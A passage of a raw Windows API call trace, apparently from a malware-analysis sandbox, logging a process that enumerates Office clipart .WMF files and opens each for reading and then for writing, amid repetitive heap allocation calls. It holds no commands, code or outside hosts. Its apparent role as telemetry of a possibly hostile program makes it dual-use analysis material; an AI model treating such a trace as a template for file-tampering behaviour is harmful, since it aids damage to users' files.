hHeap=0x20000) returned 1 [0102.815] CloseHandle (hObject=0x33c) returned 1 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.816] AreFileApisANSI () returned 1 [0102.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 69 [0102.816] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1498)) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0102.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.816] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00270_.WMF", cAlternateFileName="")) returned 1 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0102.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0102.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0102.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0102.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.817] AreFileApisANSI () returned 1 [0102.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0102.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.817] AreFileApisANSI () returned 1 [0102.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0102.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 69 [0102.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.818] GetFileType (hFile=0x33c) returned 0x1 [0102.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0102.818] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.818] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.818] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.818] CloseHandle (hObject=0x33c) returned 1 [0102.819] AreFileApisANSI () returned 1 [0102.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0102.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 69 [0102.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.819] GetFileType (hFile=0x33c) returned 0x1 [0102.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0102.819] CloseHandle (hObject=0x33c) returned 1 [0102.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0102.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.820] AreFileApisANSI () returned 1 [0102.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0102.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 69 [0102.820] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc8)) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0102.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.821] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00273_.WMF", cAlternateFileName="")) returned 1 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0102.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0102.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.821] AreFileApisANSI () returned 1 [0102.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0102.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.822] AreFileApisANSI () returned 1 [0102.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.822] RtlAllocateHeap (HeapHandle=0x20000, 